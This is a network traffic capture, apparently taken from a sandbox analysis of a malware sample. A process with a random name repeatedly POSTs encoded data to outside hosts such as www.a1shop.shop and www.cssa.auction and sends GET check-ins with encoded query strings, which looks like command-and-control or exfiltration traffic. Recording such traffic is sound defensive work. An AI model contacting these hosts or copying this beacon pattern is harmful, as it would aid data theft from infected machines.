                                                            User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:36.0) Gecko/20100101 Firefox/36.0,gzip(gfe)
                                                            Data Raw: 39 48 61 44 3d 6c 57 79 70 58 48 6a 39 39 57 4c 45 41 6c 4d 6c 58 7a 44 2f 31 4b 34 53 74 4c 72 46 4b 42 4d 6b 38 64 6e 66 52 37 59 30 33 79 35 6d 41 6c 72 30 75 30 2f 74 4a 38 6c 30 7a 61 56 2b 2b 37 5a 59 49 6b 6a 49 4e 67 41 36 2b 44 48 38 72 48 50 4d 36 75 59 75 36 78 4a 70 47 51 77 64 48 64 55 30 58 67 56 73 57 2f 35 50 73 36 65 54 58 38 6d 6e 6b 35 53 4f 2f 45 46 74 33 71 4f 46 33 58 75 6b 42 42 35 43 48 69 6a 4d 71 41 4a 2b 50 64 39 51 58 48 57 62 6f 63 39 59 68 59 45 73 69 34 4e 65 4f 53 48 66 30 50 4a 46 63 6b 55 56 6a 2f 4b 45 6e 2f 73 41 46 7a 47 54 61 65 6b 55 63 42 36 6b 7a 63 52 50 75 6e 74 65 33 2b 65 4c 51 37 75 30 64 51 3d 3d
                                                            Data Ascii: 9HaD=lWypXHj99WLEAlMlXzD/1K4StLrFKBMk8dnfR7Y03y5mAlr0u0/tJ8l0zaV++7ZYIkjINgA6+DH8rHPM6uYu6xJpGQwdHdU0XgVsW/5Ps6eTX8mnk5SO/EFt3qOF3XukBB5CHijMqAJ+Pd9QXHWboc9YhYEsi4NeOSHf0PJFckUVj/KEn/sAFzGTaekUcB6kzcRPunte3+eLQ7u0dQ==


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            11192.168.2.104997413.248.169.48806048C:\Program Files (x86)\dAjQDdCpNwLhjCqxIqvaEamXnqFgTeAHuYvHbyKYDFpIkktk\VgGNmkZfWSSE.exe
                                                            TimestampBytes transferredDirectionData
                                                            Nov 24, 2024 08:14:35.619338989 CET1697OUTPOST /5cnx/ HTTP/1.1
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                            Accept-Encoding: gzip, deflate
                                                            Accept-Language: en-US,en;q=0.5
                                                            Host: www.a1shop.shop
                                                            Origin: http://www.a1shop.shop
                                                            Referer: http://www.a1shop.shop/5cnx/
                                                            Cache-Control: max-age=0
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Content-Length: 1229
                                                            Connection: close
                                                            User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:36.0) Gecko/20100101 Firefox/36.0,gzip(gfe)
                                                            Data Raw: 39 48 61 44 3d 6c 57 79 70 58 48 6a 39 39 57 4c 45 41 6c 4d 6c 58 7a 44 2f 31 4b 34 53 74 4c 72 46 4b 42 4d 6b 38 64 6e 66 52 37 59 30 33 79 68 6d 41 58 6a 30 75 54 4c 74 49 38 6c 30 77 61 56 7a 2b 37 59 45 49 6b 4b 44 4e 67 38 4d 2b 42 50 38 74 6c 33 4d 34 63 38 75 6a 42 4a 70 5a 41 77 63 4b 39 55 6c 58 67 46 53 57 2b 56 50 73 36 65 54 58 2b 2b 6e 7a 37 71 4f 39 45 46 75 6a 36 4f 7a 7a 58 75 41 42 41 52 34 48 69 32 37 72 77 70 2b 42 5a 68 51 56 55 2b 62 6c 63 39 61 74 34 45 6b 69 34 42 42 4f 57 66 39 30 4f 38 65 63 6b 73 56 68 70 6a 2b 32 4e 74 61 52 77 47 70 61 34 41 59 54 45 69 32 78 49 52 47 35 55 42 33 6c 4d 4b 61 65 2f 33 52 65 73 4c 54 2f 6e 46 56 6c 53 65 45 57 6a 32 79 4a 62 34 67 4c 66 59 59 79 74 53 69 78 30 42 77 32 41 52 62 72 75 2b 46 6f 56 54 4d 42 71 6b 4e 50 62 37 31 49 73 52 43 36 73 46 54 46 77 75 39 7a 57 79 4a 71 64 52 35 43 63 67 79 72 36 35 6b 68 4f 62 48 4c 43 67 30 70 57 64 6c 4a 76 46 77 32 30 31 73 43 67 39 32 30 75 5a 69 73 78 55 73 55 52 6c 37 76 4e 37 6d 44 55 32 63 41 [TRUNCATED]
                                                            Data Ascii: 9HaD=lWypXHj99WLEAlMlXzD/1K4StLrFKBMk8dnfR7Y03yhmAXj0uTLtI8l0waVz+7YEIkKDNg8M+BP8tl3M4c8ujBJpZAwcK9UlXgFSW+VPs6eTX++nz7qO9EFuj6OzzXuABAR4Hi27rwp+BZhQVU+blc9at4Eki4BBOWf90O8ecksVhpj+2NtaRwGpa4AYTEi2xIRG5UB3lMKae/3ResLT/nFVlSeEWj2yJb4gLfYYytSix0Bw2ARbru+FoVTMBqkNPb71IsRC6sFTFwu9zWyJqdR5Ccgyr65khObHLCg0pWdlJvFw201sCg920uZisxUsURl7vN7mDU2cAZYmIAAvsVLqtAFLjv+3s9dFx6D1EiadO4nzxMRDb8S0oXYgYbvI08wtOW9ZawP76rwocjRuScLlKowjoHqsOO+Y/k+4tvB+M65B1aSbQZMIJGFtOOJhM7c2HL2QaIv2sTRxyCEGc/GqPFNSFC+guXneZK4WCrdzzNAs3e62zuR6Q5jnesv4y0qrGm27yZCdCGuTobfJWV0IUJ0h1aijX+yBR18zGvAAeIf9+O6qxxGGHoUgNlCS4gzBTd/PVNdGc29C/ONUxNrS1SS+SMpbLmM3fGvanGdFM9l/1Kvz5RcvZC41dNDl7on1Wk1HS62SA4FxE0TLG83ppLmjzCZu59EPYUHJMSfB/A9uH8FUylLSMaIcEbh3KS5ryal2ZaZEaSreOSTg7tdxsZuzruZTjA5KTcrz1F5iJxolgqoab5Qpje7HDAOkQur5IZUUzlnoFMoxNa11TLYpZHGLmzQsxH2iVmE5x8ZBHWP+dPgtZDkGu1nVVpWMSWi5XbIMMdKCSHfXDE/qLDyGA0bQaKmEtJh33V0OmfXnclDgbdo5BVvEm2sP6vwpDwBL9cOoYkTJyPL04ewkUvIrnHewSqk5X6hmiO7k6c7b8R2h3bD6u+9dYIYYgrRpA9Mn3WxIIy4OuBymj1nngK0Xa02HOmhm+2B2M/ZFCgGNoMT [TRUNCATED]


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            12192.168.2.104998013.248.169.48806048C:\Program Files (x86)\dAjQDdCpNwLhjCqxIqvaEamXnqFgTeAHuYvHbyKYDFpIkktk\VgGNmkZfWSSE.exe
                                                            TimestampBytes transferredDirectionData
                                                            Nov 24, 2024 08:14:38.268861055 CET399OUTGET /5cnx/?9HaD=oUaJUx3W91XKGFwkbiDYgYplg4TZBQwbgtCkXvgonjE8SHvx+U3TNstQnLVJ8Y9FFWXzakAfwSz/u1Ky3cg6+DtwGVYcLfdFQx5ESoBa74WqNsm9mQ==&wdv4=1RD4 HTTP/1.1
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                            Accept-Language: en-US,en;q=0.5
                                                            Host: www.a1shop.shop
                                                            Connection: close
                                                            User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:36.0) Gecko/20100101 Firefox/36.0,gzip(gfe)
                                                            Nov 24, 2024 08:14:39.452709913 CET386INHTTP/1.1 200 OK
                                                            Server: openresty
                                                            Date: Sun, 24 Nov 2024 07:14:39 GMT
                                                            Content-Type: text/html
                                                            Content-Length: 246
                                                            Connection: close
                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 39 48 61 44 3d 6f 55 61 4a 55 78 33 57 39 31 58 4b 47 46 77 6b 62 69 44 59 67 59 70 6c 67 34 54 5a 42 51 77 62 67 74 43 6b 58 76 67 6f 6e 6a 45 38 53 48 76 78 2b 55 33 54 4e 73 74 51 6e 4c 56 4a 38 59 39 46 46 57 58 7a 61 6b 41 66 77 53 7a 2f 75 31 4b 79 33 63 67 36 2b 44 74 77 47 56 59 63 4c 66 64 46 51 78 35 45 53 6f 42 61 37 34 57 71 4e 73 6d 39 6d 51 3d 3d 26 77 64 76 34 3d 31 52 44 34 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                                            Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?9HaD=oUaJUx3W91XKGFwkbiDYgYplg4TZBQwbgtCkXvgonjE8SHvx+U3TNstQnLVJ8Y9FFWXzakAfwSz/u1Ky3cg6+DtwGVYcLfdFQx5ESoBa74WqNsm9mQ==&wdv4=1RD4"}</script></head></html>


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            13192.168.2.1049987107.167.84.42806048C:\Program Files (x86)\dAjQDdCpNwLhjCqxIqvaEamXnqFgTeAHuYvHbyKYDFpIkktk\VgGNmkZfWSSE.exe
                                                            TimestampBytes transferredDirectionData
                                                            Nov 24, 2024 08:14:45.918659925 CET663OUTPOST /bw18/ HTTP/1.1
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                            Accept-Encoding: gzip, deflate
                                                            Accept-Language: en-US,en;q=0.5
                                                            Host: www.cssa.auction
                                                            Origin: http://www.cssa.auction
                                                            Referer: http://www.cssa.auction/bw18/
                                                            Cache-Control: max-age=0
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Content-Length: 193
                                                            Connection: close
                                                            User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:36.0) Gecko/20100101 Firefox/36.0,gzip(gfe)
                                                            Data Raw: 39 48 61 44 3d 68 6a 69 6d 42 4d 75 52 74 63 7a 54 51 49 65 4e 71 6d 64 70 2b 43 4c 41 75 72 5a 34 72 69 68 71 52 4b 6c 38 61 41 64 52 76 4e 4f 4f 34 56 74 65 75 38 79 37 68 47 71 77 33 73 47 30 72 4d 6a 30 34 5a 4d 7a 44 69 41 45 44 64 72 39 6f 51 44 41 4a 50 7a 79 6f 35 70 63 61 46 68 4c 34 6e 50 62 36 48 69 42 38 6a 5a 75 32 6b 36 72 79 5a 48 51 4f 6f 73 46 5a 56 4f 76 4a 38 30 53 53 70 75 6c 45 41 46 6b 34 69 66 38 31 6e 35 49 7a 6a 74 36 4f 68 70 6c 67 73 68 70 63 5a 6a 33 61 62 50 6b 32 6a 43 62 7a 6e 63 2b 53 76 37 70 69 6e 70 56 2f 6e 33 6d 56 62 64 4c 4c 72 7a 7a
                                                            Data Ascii: 9HaD=hjimBMuRtczTQIeNqmdp+CLAurZ4rihqRKl8aAdRvNOO4Vteu8y7hGqw3sG0rMj04ZMzDiAEDdr9oQDAJPzyo5pcaFhL4nPb6HiB8jZu2k6ryZHQOosFZVOvJ80SSpulEAFk4if81n5Izjt6OhplgshpcZj3abPk2jCbznc+Sv7pinpV/n3mVbdLLrzz
                                                            Nov 24, 2024 08:14:47.154764891 CET1236INHTTP/1.1 404 Not Found
                                                            Connection: close
                                                            cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                            pragma: no-cache
                                                            content-type: text/html
                                                            content-length: 1251
                                                            date: Sun, 24 Nov 2024 07:14:46 GMT
                                                            server: LiteSpeed
                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 [TRUNCATED]
                                                            Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div><div style="color:#f0f0f0; font-size:12px;margin:auto;padding:0px 30px 0px 30px;position:relative;clear:both;height:100px;margin-top:-101px;background-color:#474747;border-top: 1px solid rgba(0,0,0,0.15);box-shadow: 0
                                                            Nov 24, 2024 08:14:47.154863119 CET253INData Raw: 20 31 70 78 20 30 20 72 67 62 61 28 32 35 35 2c 20 32 35 35 2c 20 32 35 35 2c 20 30 2e 33 29 20 69 6e 73 65 74 3b 22 3e 0a 3c 62 72 3e 50 72 6f 75 64 6c 79 20 70 6f 77 65 72 65 64 20 62 79 20 4c 69 74 65 53 70 65 65 64 20 57 65 62 20 53 65 72 76
                                                            Data Ascii: 1px 0 rgba(255, 255, 255, 0.3) inset;"><br>Proudly powered by LiteSpeed Web Server<p>Please be advised that LiteSpeed Technologies Inc. is not a web hosting company and, as such, has no control over content found on this site.</p></div></bod


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            14192.168.2.1049988107.167.84.42806048C:\Program Files (x86)\dAjQDdCpNwLhjCqxIqvaEamXnqFgTeAHuYvHbyKYDFpIkktk\VgGNmkZfWSSE.exe
                                                            TimestampBytes transferredDirectionData
                                                            Nov 24, 2024 08:14:48.589859962 CET687OUTPOST /bw18/ HTTP/1.1
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                            Accept-Encoding: gzip, deflate
                                                            Accept-Language: en-US,en;q=0.5
                                                            Host: www.cssa.auction
                                                            Origin: http://www.cssa.auction
                                                            Referer: http://www.cssa.auction/bw18/
                                                            Cache-Control: max-age=0
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Content-Length: 217
                                                            Connection: close
                                                            User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:36.0) Gecko/20100101 Firefox/36.0,gzip(gfe)
                                                            Data Raw: 39 48 61 44 3d 68 6a 69 6d 42 4d 75 52 74 63 7a 54 52 74 4f 4e 74 42 68 70 76 53 4c 48 69 4c 5a 34 68 43 68 51 52 4b 70 38 61 42 6f 61 75 2b 36 4f 35 33 6c 65 76 2b 57 37 6d 47 71 77 34 4d 47 78 76 4d 6a 46 34 5a 77 4e 44 6e 34 45 44 64 2f 39 6f 52 54 41 4a 2b 7a 39 75 70 70 61 45 6c 68 65 38 6e 50 62 36 48 69 42 38 6a 64 55 32 6b 69 72 79 70 58 51 49 4a 73 45 61 56 4f 75 4f 38 30 53 57 70 75 68 45 41 45 7a 34 6a 54 57 31 68 39 49 7a 6d 52 36 4f 51 70 6d 70 73 68 76 53 35 69 57 66 35 75 2f 79 52 32 30 78 33 31 79 4d 66 33 37 68 47 55 53 75 32 57 78 47 73 42 46 46 74 47 5a 57 39 48 46 71 42 78 59 33 69 64 72 5a 35 41 78 70 4a 63 66 74 67 3d 3d
                                                            Data Ascii: 9HaD=hjimBMuRtczTRtONtBhpvSLHiLZ4hChQRKp8aBoau+6O53lev+W7mGqw4MGxvMjF4ZwNDn4EDd/9oRTAJ+z9uppaElhe8nPb6HiB8jdU2kirypXQIJsEaVOuO80SWpuhEAEz4jTW1h9IzmR6OQpmpshvS5iWf5u/yR20x31yMf37hGUSu2WxGsBFFtGZW9HFqBxY3idrZ5AxpJcftg==
                                                            Nov 24, 2024 08:14:49.821301937 CET1236INHTTP/1.1 404 Not Found
                                                            Connection: close
                                                            cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                            pragma: no-cache
                                                            content-type: text/html
                                                            content-length: 1251
                                                            date: Sun, 24 Nov 2024 07:14:49 GMT
                                                            server: LiteSpeed
                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 [TRUNCATED]
                                                            Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div><div style="color:#f0f0f0; font-size:12px;margin:auto;padding:0px 30px 0px 30px;position:relative;clear:both;height:100px;margin-top:-101px;background-color:#474747;border-top: 1px solid rgba(0,0,0,0.15);box-shadow: 0
                                                            Nov 24, 2024 08:14:49.821337938 CET253INData Raw: 20 31 70 78 20 30 20 72 67 62 61 28 32 35 35 2c 20 32 35 35 2c 20 32 35 35 2c 20 30 2e 33 29 20 69 6e 73 65 74 3b 22 3e 0a 3c 62 72 3e 50 72 6f 75 64 6c 79 20 70 6f 77 65 72 65 64 20 62 79 20 4c 69 74 65 53 70 65 65 64 20 57 65 62 20 53 65 72 76
                                                            Data Ascii: 1px 0 rgba(255, 255, 255, 0.3) inset;"><br>Proudly powered by LiteSpeed Web Server<p>Please be advised that LiteSpeed Technologies Inc. is not a web hosting company and, as such, has no control over content found on this site.</p></div></bod


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            15192.168.2.1049989107.167.84.42806048C:\Program Files (x86)\dAjQDdCpNwLhjCqxIqvaEamXnqFgTeAHuYvHbyKYDFpIkktk\VgGNmkZfWSSE.exe
                                                            TimestampBytes transferredDirectionData
                                                            Nov 24, 2024 08:14:51.263487101 CET1700OUTPOST /bw18/ HTTP/1.1
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                            Accept-Encoding: gzip, deflate
                                                            Accept-Language: en-US,en;q=0.5
                                                            Host: www.cssa.auction
                                                            Origin: http://www.cssa.auction
                                                            Referer: http://www.cssa.auction/bw18/
                                                            Cache-Control: max-age=0
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Content-Length: 1229
                                                            Connection: close
                                                            User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:36.0) Gecko/20100101 Firefox/36.0,gzip(gfe)
                                                            Data Raw: 39 48 61 44 3d 68 6a 69 6d 42 4d 75 52 74 63 7a 54 52 74 4f 4e 74 42 68 70 76 53 4c 48 69 4c 5a 34 68 43 68 51 52 4b 70 38 61 42 6f 61 75 2f 43 4f 35 43 70 65 75 66 57 37 6e 47 71 77 78 73 47 77 76 4d 6a 63 34 5a 59 33 44 6e 38 75 44 66 48 39 70 7a 4c 41 5a 4b 6e 39 67 70 70 61 4d 46 67 35 34 6e 50 4f 36 48 79 46 38 69 74 55 32 6b 69 72 79 76 54 51 49 59 73 45 63 56 4f 76 4a 38 30 65 53 70 75 4a 45 41 63 6a 34 6a 48 73 31 53 31 49 77 47 68 36 4d 43 52 6d 6d 73 68 74 66 5a 69 30 66 35 69 61 79 52 71 34 78 33 77 64 4d 64 6e 37 79 78 74 57 7a 48 79 4e 51 4b 46 75 4c 64 36 68 45 70 66 41 6a 44 49 6f 35 51 6c 4f 48 34 55 6e 6e 4c 52 4c 78 66 2f 71 77 68 49 79 45 66 6a 52 4a 70 41 35 76 4d 41 76 4d 35 6d 6b 61 61 2b 76 75 76 62 71 6b 58 68 63 49 36 4d 74 46 2f 4a 68 35 36 6d 53 6c 4e 42 4e 6b 4f 68 4f 5a 71 56 4a 42 61 37 76 49 53 48 62 79 6f 35 78 2f 2b 38 75 44 35 6c 74 4a 35 51 33 73 59 35 53 75 62 65 70 38 75 53 7a 38 4f 7a 33 33 7a 6f 64 2b 4d 50 4b 79 6f 66 74 6d 77 38 5a 44 49 6c 2f 32 70 62 31 37 [TRUNCATED]
                                                            Data Ascii: 9HaD=hjimBMuRtczTRtONtBhpvSLHiLZ4hChQRKp8aBoau/CO5CpeufW7nGqwxsGwvMjc4ZY3Dn8uDfH9pzLAZKn9gppaMFg54nPO6HyF8itU2kiryvTQIYsEcVOvJ80eSpuJEAcj4jHs1S1IwGh6MCRmmshtfZi0f5iayRq4x3wdMdn7yxtWzHyNQKFuLd6hEpfAjDIo5QlOH4UnnLRLxf/qwhIyEfjRJpA5vMAvM5mkaa+vuvbqkXhcI6MtF/Jh56mSlNBNkOhOZqVJBa7vISHbyo5x/+8uD5ltJ5Q3sY5Subep8uSz8Oz33zod+MPKyoftmw8ZDIl/2pb17iDefW2iyV2WxpgWe42qLJhtckyzNvD72rmk3XAPoPVzTVsOQJsFhNZ8jhJguXOeZqVGYf4PnPcStuM8t1w4Ty4GsZw+sd+o/coMYw6Myq4WEaBqxnt5K0lkzKQWkgXOb+w54v890fCTEEU/TmdMSqPOyZPOO1emIwIiOPXyW/TzI/HqhWjR0vS7k9/QYi7DWk2KhP5MCX+HedjKPpHVxeNHnDNRzacgRqfMr1WfGw+SL1kHRbIkTH0pJrJSjbgU7fxB+583T49mdJf/etPRxCngg17nlxllaC5aFVp3h8y2j7qcv5JmcyqPH1zYm/CMWMeUK2AL8W2+msPworKvU5P47cvsRZm5AoCWWq4+cBGPB+mI5YcOAce8IVmjNhyGJEQMpzV3y9Fth45XjQ9hMto5zLRGO305cQmgKcUJzV/YzovGmn1rSyIlaN6nfKc7P7RUMQfrvxKjtHWYvCqUHOlRWiD+5bE8OJcrePIqHtIRUcUhnNwsxXJJtdFd6LjjHyygdZOKGkSUCf4pg1HmAa6SzQnfCwGBI8wxmMSjQe4PX8hBrK/QBtXg42pl6dN4yHiiQE8T9ITjSDKikoa5mg4tZ6lXzxIrjEeYmgD4eDntakOEFxviqQUjLDICLBe68bMN9J80V4SldQ15AoVH0Fub2eZrGw2hHIu [TRUNCATED]
                                                            Nov 24, 2024 08:14:52.450073004 CET1236INHTTP/1.1 404 Not Found
                                                            Connection: close
                                                            cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                            pragma: no-cache
                                                            content-type: text/html
                                                            content-length: 1251
                                                            date: Sun, 24 Nov 2024 07:14:52 GMT
                                                            server: LiteSpeed
                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 [TRUNCATED]
                                                            Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div><div style="color:#f0f0f0; font-size:12px;margin:auto;padding:0px 30px 0px 30px;position:relative;clear:both;height:100px;margin-top:-101px;background-color:#474747;border-top: 1px solid rgba(0,0,0,0.15);box-shadow: 0
                                                            Nov 24, 2024 08:14:52.450131893 CET224INData Raw: 20 31 70 78 20 30 20 72 67 62 61 28 32 35 35 2c 20 32 35 35 2c 20 32 35 35 2c 20 30 2e 33 29 20 69 6e 73 65 74 3b 22 3e 0a 3c 62 72 3e 50 72 6f 75 64 6c 79 20 70 6f 77 65 72 65 64 20 62 79 20 4c 69 74 65 53 70 65 65 64 20 57 65 62 20 53 65 72 76
                                                            Data Ascii: 1px 0 rgba(255, 255, 255, 0.3) inset;"><br>Proudly powered by LiteSpeed Web Server<p>Please be advised that LiteSpeed Technologies Inc. is not a web hosting company and, as such, has no control over content found on this s
                                                            Nov 24, 2024 08:14:52.450161934 CET29INData Raw: 69 74 65 2e 3c 2f 70 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                            Data Ascii: ite.</p></div></body></html>


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            16192.168.2.1049990107.167.84.42806048C:\Program Files (x86)\dAjQDdCpNwLhjCqxIqvaEamXnqFgTeAHuYvHbyKYDFpIkktk\VgGNmkZfWSSE.exe
                                                            TimestampBytes transferredDirectionData
                                                            Nov 24, 2024 08:14:53.929368973 CET400OUTGET /bw18/?9HaD=shKGC8bK6vrLacDTgBZk6Rr0hJ1HgilraKgFYlsRqeuAlXFl2di5oGGCrfCVn8Xiw6EWTnMqBe6emh6gDO/8taYQfWAt8ESD/mKf9DNdyFPR+ujYTQ==&wdv4=1RD4 HTTP/1.1
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                            Accept-Language: en-US,en;q=0.5
                                                            Host: www.cssa.auction
                                                            Connection: close
                                                            User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:36.0) Gecko/20100101 Firefox/36.0,gzip(gfe)
                                                            Nov 24, 2024 08:14:55.212100983 CET1236INHTTP/1.1 404 Not Found
                                                            Connection: close
                                                            cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                            pragma: no-cache
                                                            content-type: text/html
                                                            content-length: 1251
                                                            date: Sun, 24 Nov 2024 07:14:55 GMT
                                                            server: LiteSpeed
